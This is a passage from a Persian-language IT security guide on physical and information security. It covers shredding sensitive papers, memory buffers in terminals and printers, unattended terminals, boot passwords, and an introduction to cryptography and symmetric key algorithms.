‫ﺑﺪﻧﺒﺎﻝ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺖ ‪ -‬ﺭﺍ ﺑﺪﻭﻥ ﻫﻴﭻ ﻣﺮﺍﻗﺒﺖ ﺧﺎﺻﻲ ﺩﻭﺭ ﻣﻲﺭﻳﺰﻧﺪ‪.‬‬

‫‪63‬‬ ‫‪Sanitizing‬‬
‫‪64‬‬ ‫‪Filtering‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٩٠‬‬

‫ﺑﺮﺍﻱ ﻫﺮﺟﺎ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﺩﺭ ﺁﻧﺠﺎ ﺩﻭﺭ ﺭﻳﺨﺘﻪ ﻣﻲﺷﻮﺩ ﻛﺎﻏﺬ ﺧﺮﺩﻛﻦ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻣﻮﺯﺵ ﺩﻫﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ‬
‫ﺭﺍ ﺩﺭ ﺳﻄﻠﻬﺎﻱ ﺧﺎﻧﻪ ﺩﻭﺭ ﻧﻴﺎﻧﺪﺍﺯﻧﺪ‪ ،‬ﺑﻠﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺩﻓﺘﺮ ﺑﻴﺎﻭﺭﻧﺪ ﺗﺎ ﺩﺭ ﺩﺳﺘﮕﺎﻩ ﺧﺮﺩ ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﺳﺎﺯﻣﺎﻧﺘﺎﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﺰﺭﮒ ﺍﺳـﺖ ﻭ‬
‫ﻗﺎﻧﻮﻥ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﺟﺎﺯﻩ ﺭﺍ ﻣﻲﺩﻫﺪ‪ ،‬ﺷﺎﻳﺪ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺑﺮﺧﻲ ﺍﺯ ﺩﻭﺭﺭﻳﺰﻫﺎﻱ ﻛﺎﻏﺬﻫﺎﻱ ﺣﺴﺎﺱ ﺭﺍ ﺩﺭ ﻣﺤﻮﻃﻪ ﻛﺎﺭﺧﺎﻧﻪ ﺑﺴﻮﺯﺍﻧﻴﺪ‪.‬‬

‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺎﻓﻈﻪﻫﺎﻱ ﻣﺤﻠﻲ‬


‫ﻋﻼﻭﻩ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺍﻧﺒﻮﻩ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﭘـﺮﺩﺍﺯﺵ ﺍﻟﻜﺘﺮﻳﻜـﻲ ﺩﺍﺩﻩﻫـﺎ ﻧﻴـﺰ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺩﺭ ﺧـﻮﺩ‬
‫ﻻ ‪buffer‬ﻫﺎﻱ ﺣﺎﻓﻈﻪ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺎ ﺩﺳـﺘﻮﺭﺍﺕ‬ ‫ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﭘﺎﻳﺎﻧﻪﻫﺎ‪ ،٦٥‬ﻣﻮﺩﻣﻬﺎ‪ ،‬ﻭ ﭼﺎﭘﮕﺮﻫﺎﻱ ﻟﻴﺰﺭﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻨﺎﺳﺐ ﻛﻨﺘﺮﻟﻲ ﺑﺎﺭﮔﺬﺍﺭﻱ ﻳﺎ ﺑﺎﺭﺑﺮﺩﺍﺭﻱ ﺷﻮﻧﺪ‪.‬‬
‫ﺑﻪ ﻃﻮﺭ ﻃﺒﻴﻌﻲ ﻫﺮ ﻗﻄﻌﺔ ﺣﺎﻓﻈﻪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﻳﻚ ﻣﺸﻜﻞ ﺣﻔﺎﻇﺘﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺧﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺑﻮﻳﮋﻩ ﺍﮔـﺮ ﺍﺯ‬
‫ﺁﻥ ﻗﻄﻌﺔ ﺣﺎﻓﻈﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺸﺎﺑﻪ ﻣﺤﻔﺎﻇﺖ ﻧﺸﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤـﺎﻝ ﺣﺎﻓﻈـﻪﻫـﺎﻱ ﻣﺤﻠـﻲ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻭﺳﺎﻳﻞ ﻳﻚ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺿﺎﻓﻪ ﺑﺎ ﺧﻮﺩ ﺩﺍﺭﻧﺪ‪ ،‬ﭼﻮﻥ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺩﺭ ﺍﻳﻦ ﺣﺎﻓﻈﻪﻫـﺎ ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺑـﺪﻭﻥ ﺍﻃـﻼﻉ ﻛـﺎﺭﺑﺮ ﺭﺍﻳﺎﻧـﻪ‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ‬


‫ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻧﻬﺎ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺣﺎﻟﺖ ﻭﺍﺭﺩ ﺷﺪﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﻫﺎ ﻣﻲﻛﻨﻨﺪ ﺑﺴﻴﺎﺭ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﺗﺨﺮﻳﺒﮕﺮﺍﻥ ﻭ ﻣﻬﺎﺟﻤـﺎﻥ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﻳﻚ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺧﺎﻃﺮ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺷﺨﺺ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﺍﺯ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﺍﻳﻦ ﺷﺨﺺ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﻪ ﺷﺮﻭﻉ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺣﻤﻠﻪ ﻋﻠﻴﻪ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﺎ ﻛﻞ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﻳـﺪ‪ :‬ﻫﺮﮔﻮﻧـﻪ‬
‫ﺭﺩﻳﺎﺑﻲ ﺣﻤﻠﻪ ﻃﺒﻴﻌﺘﹰﺎ ﺍﻧﮕﺸﺖ ﺍﺗﻬﺎﻡ ﺭﺍ ﻣﺘﻮﺟﻪ ﺷﺨﺺ ﺻﺎﺣﺐ ﺁﻥ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﻣﻲﻛﻨﺪ ﻭ ﻧﻪ ﺗﺨﺮﻳﺒﮕﺮ‪ .‬ﻫﻴﭽﮕﺎﻩ ﻧﺒﺎﻳﺪ ﭘﺎﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻱ ﻛﻮﺗﺎﻩ ﺯﻣﺎﻧﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻛﺮﺩ‪.‬‬
‫ﻣﺪﺗﻲ ﺑﻴﺶ ﺍﺯ ﺑﺎﺯﻩﻫﺎ ﹺ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﻣﺤﺎﻓﻈﻬﺎﻱ ﺻﻔﺤﻪﻧﻤﺎﻳﺶ ﺍﻳﻦ ﻗﺪﺭﺕ ﺭﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﮔﺮ ﭘﺎﻳﺎﻧﺔ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﺑﻴﺶ ﺍﺯ ﭼﻨﺪ ﺩﻗﻴﻘﻪ ﺑﻲﺍﺳـﺘﻔﺎﺩﻩ ﻣﺎﻧـﺪ ﺍﻭ ﺭﺍ‬
‫ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﺎﺭﺝ ‪ -‬ﻳﺎ ﺣﺪﺍﻗﻞ ﺻﻔﺤﻪﻧﻤﺎﻳﺶ ﺍﻭ ﺭﺍ ﺧﺎﻟﻲ ﻭ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻭﻱ ﺭﺍ ﻗﻔـﻞ ‪ -‬ﻛﻨﻨـﺪ‪ .‬ﺍﺯ ﻣﺰﺍﻳـﺎﻱ ﺍﻳـﻦ ﻗﺎﺑﻠﻴﺘﻬـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬

‫ﻛﻠﻴﺪﻫﺎﻱ ﻣﺤﺎﻓﻆ‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻛﻠﻴﺪﻱ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﺑﻌﻀﻲ‬
‫ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ‪ ROM‬ﻫﻢ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻩ ﺍﺯ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺑﺪﻭﻥ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺷـﺘﻦ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺳﻴﺴﺘﻢ ‪ openBOOT‬ﺷـﺮﻛﺖ ‪ Sun‬ﻭ ﻫﻤـﺔ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺟﺪﻳـﺪ ‪ Macintosh‬ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺤﺎﻓﻆ ﻭ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ‪ ROM‬ﺍﻳﻤﻨﻲ ﺑﻴﺸﺘﺮﻱ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻫﺮﮔﺎﻩ ﻛـﻪ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﺑﺎﺷـﺪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ٦٦.‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺎﻳﺪ ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺧﺘﻼﻝ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﺁﻧـﺮﺍ ﺍﺯ ﭘﺮﻳـﺰ ﺑـﺮﻕ ﺟـﺪﺍ ﻛﻨـﺪ‪.‬‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻬﻤﺘﺮﻳﻦ ﺭﻭﺵ ﺣﻔﺎﻇﺖ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ‪.‬‬

‫‪65‬‬ ‫‪Terminals‬‬
‫ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩﻫﺎﻱ ‪ ROM‬ﻳﻚ ﺩﻟﻴﻞ ﺧﻮﺏ ﺩﻳﮕﺮ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻴﺎﻓﺘـﺪ ﺍﮔـﺮ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺑـﻪ‬ ‫‪٦٦‬‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﺪ‪ ،‬ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺧﺎﻣﻮﺵ ﻛﻨﺪ‪.‬‬
‫‪٢٩١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺭﻭﻱ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺗﻤﺮﻛﺰ ﺩﺍﺭﺩ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ‪ ،‬ﺗﺤﺮﻳﻒ‪ ،‬ﻭ ﻳﺎ ﺗﺨﺮﻳﺐ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺑﻌـﺎﺩ ﺍﻣﻨﻴـﺖ‬
‫ﻻ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ٦٧‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻳﺎ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﺩﺍﺩﻩﻫـﺎ‪ ،‬ﺑﺮﻧﺎﻣـﻪﻫـﺎ‪ ،‬ﻭ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺳﻴـﺴﺘﻢ ﺗﻮﺳـﻂ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻏﻴﺮﻣﺠﺎﺯ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﻨﺪ ‪ -‬ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺳﺖﻧﺨﻮﺭﺩﻩ ﻭ ﺻﺤﻴﺢ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻩﺍﻧﺪ‪ .‬ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻗﺴﻤﺖ ﺗـﺎ‬
‫ﺣﺪ ﺯﻳﺎﺩﻱ ﻣﻔﻬﻮﻣﻲ ﺍﺳﺖ‪ ،‬ﻫﺮﭼﻨﺪ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﭼﻨﺪ ﺍﺻﻞ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻭﺍﻗﻌﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬

‫ﺭﻣﺰﻧﮕﺎﺭﻱ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ‪ ٦٨‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺳﺖ ﺍﺯ ﻓﻨﻮﻥ ﺭﻳﺎﺿﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗـﻮﺍﻥ ﻛﻠﻤـﺎﺕ ﻣﻜﺘـﻮﺏ ﻭ ﺩﻳﮕـﺮ‬
‫ﺍﻧﻮﺍﻉ ﭘﻴﺎﻡ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﺒﺪﻳﻞ ﻛﺮﺩ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻛﻠﻴﺪ ﻭﻳﮋﺓ ﺭﻳﺎﺿﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﺎﺯﻛﺮﺩﻥ ﻗﻔﻞ ﭘﻴﺎﻣﻬﺎ ﻻﺯﻡ ﺍﺳـﺖ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﻧﺪﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ ﺁﻥ ﭘﻴﺎﻣﻬﺎ ﺑﺮﺍﻳﺶ ﺑﻲﻣﻔﻬﻮﻡ ﺑﻨﻈﺮ ﺑﻴﺎﻳﺪ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ ﻳﻚ ﭘﻴﺎﻡ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ٦٩‬ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﻓﺮﺁﻳﻨـﺪ‬
‫ﺑﺎﺯﮔﺸﺖ ﻳﻚ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻗﺎﻟﺐ ﺍﻭﻟﻴﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻣﻨﺎﺳﺐ ﻧﻴﺰ ﺭﻣﺰﮔﺸﺎﻳﻲ‪ ٧٠‬ﻧﺎﻡ ﺩﺍﺭﺩ‪.‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻳﻚ ﮔﻴﺮﻧﺪﺓ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻭﻗﺘـﻲ ﻗﻄﻌـﻪﺍﻱ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺗﻮﺳﻂ ﻳﻚ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺩﺯﺩﻳـﺪﻩ ﻳـﺎ ﺍﻓـﺸﺎ ﮔـﺮﺩﺩ ﺍﻣﻨﻴـﺖ ﺁﻥ ﺧﺪﺷـﻪﺩﺍﺭ‬
‫ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ ،‬ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻛﻠﻴﺪ ﻻﺯﻡ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺍﻃﻼﻋـﺎﺕ ﺍﻓـﺸﺎ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺭﻭﺵ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺗـﻼﺵ ﺑـﺮﺍﻱ‬
‫ﻲ ﺑﺪﻭﻥ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﻘﺎﻭﻣﺖ ﻛﻨﺪ‪.‬‬
‫ﺭﻣﺰﮔﺸﺎﻳ ﹺ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻓﺰﺍﻳﺶ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻋﺪﻡ ﺗﻜﺬﻳﺐ ﭘﻴﺎﻡ‪ ٧١‬ﻧﻴﺰ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺗﻮﺍﺑﻊ ﻭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ‬


‫ﺍﺳﺎﺳﹰﺎ ﺩﻭ ﻧﻮﻉ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬

‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﻘﺎﺭﻥ‬


‫ﺩﺭ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣـﺰ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﻣﺘﻘـﺎﺭﻥ ﮔـﺎﻫﻲ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﺳﺮﻱ‪ ٧٢‬ﻭ ﮔﺎﻫﻲ ﻫﻢ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ‪ ٧٣‬ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﻫـﺮﺩﻭﻱ ﺍﻳـﻦ ﻧﺎﻣﻬـﺎ ﺑـﻪ‬

‫ﻳﺎ ‪ privacy‬ﻛﻪ ﮔﺎﻫﻲ ﺑﺎ "ﻣﺤﺮﻣﺎﻧﮕﻲ" )‪ (confidentiality‬ﺑﻪ ﺟﺎﻱ ﻫﻢ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﮔﺎﻫﻲ ﻫﻢ ﺑﻪ ﻃﻮﺭ ﺟﺰﺋﻲﺗﺮ ﺑﻪ ﻣﺤﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺍﻓـﺮﺍﺩ ﮔﻔﺘـﻪ‬ ‫‪٦٧‬‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫‪68‬‬ ‫‪Cryptography‬‬
‫‪69‬‬ ‫‪Encryption‬‬
‫‪70‬‬ ‫‪Decryption‬‬
‫‪71‬‬ ‫‪Message Non-Repudiation‬‬
‫‪72‬‬ ‫‪Secret Key Algorithms‬‬
‫‪73‬‬ ‫‪Private Key Algorithms‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٩٢‬‬

‫ﺳﺎﺩﮔﻲ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ‪ ٧٤‬ﻛﻪ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻧﺪﺍﺭﻧﺪ ﺍﺷﺘﺒﺎﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺩﻭ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻧﻤﻮﺩ‪ :‬ﺍﻟﮕﻮﺭﻳﺘﻬﺎﻱ ﺑﻠﻮﻙ‪ ،٧٥‬ﻭ ﺍﻟﮕﻮﺭﻳﺘﻬﺎﻱ ﺟﺎﺭﻱ‪ .٧٦‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺑﻠﻮﻙ‪ ،‬ﺩﺍﺩﻩﻫﺎﻱ ﻳـﻚ‬
